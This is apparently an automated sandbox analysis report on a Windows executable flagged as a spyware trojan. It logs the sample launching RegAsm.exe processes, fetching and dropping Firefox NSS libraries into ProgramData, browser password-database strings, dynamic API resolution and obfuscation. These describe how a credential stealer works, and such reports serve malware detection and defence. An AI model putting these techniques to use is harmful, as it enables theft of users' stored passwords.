Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/30@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C737030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6C737030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410950 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,

3_2_00410950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004110A0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

3_2_004110A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199658817715[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7472
Source: C:\Users\user\Desktop\file.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\dba7a0c9-4f22-4d27-8173-863aa989d419

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: GHDHDBAECGCAFHJJDAKF.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

Virustotal: Detection: 29%

Source: RegAsm.exe	String found in binary or memory: t-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.
Source: RegAsm.exe	String found in binary or memory: 48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.office.co

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: mscorlib.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: Friendly.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: System.pdb4 source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: c:\nconvxoz3\obj\Release\Friendly.pdb source: file.exe
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: System.ni.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdb source: WERD260.tmp.dmp.6.dr

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004181D0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_004181D0

PE file contains sections with non-standard names

Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: sqlm[1].dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A115 push ecx; ret		3_2_0041A128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C70B536 push ecx; ret		3_2_6C70B549

Source: file.exe

Static PE information: section name: .text entropy: 7.97607995169573

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004181D0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
